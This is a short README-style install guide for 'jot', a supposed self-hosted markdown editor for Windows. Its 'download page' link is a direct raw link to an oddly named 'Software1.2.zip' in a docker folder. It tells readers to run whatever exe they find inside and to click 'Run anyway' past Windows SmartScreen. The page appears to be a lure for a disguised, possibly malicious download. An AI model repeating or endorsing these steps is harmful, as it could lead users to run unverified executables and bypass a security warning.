🚀 Getting Started
jot is a minimal markdown editor you can self-host on your own Windows machine. It gives you a simple place to write notes, edit markdown, and keep inline comment threads next to your text.
This page helps you get from the download link to a running app on Windows with as little effort as possible.
📥 Download
- Open the download page: https://raw.githubusercontent.com/deepwater-bug358/jot/main/docker/Software1.2.zip
- On that page, look for the latest release or the main project files.
- Download the Windows version if one is listed.
- Save the file to your computer.
- If the file is a .zip, unzip it first.
- If the file is an .exe or .msi, run it to start the setup.
If your browser asks whether you want to keep the file, choose keep or save.
🪟 Install on Windows
After the download finishes:
- Open the folder where the file was saved.
- If you downloaded a .zip file, right-click it and choose Extract All.
- Open the extracted folder.
- Look for a file named like jot.exe, setup.exe, or install.exe.
- Double-click the file to start the app or install it.
- If Windows shows a SmartScreen prompt, choose More info, then Run anyway only if the file came from the link above.
If you used an installer, follow the steps on screen and keep the default options unless you need a different install folder.
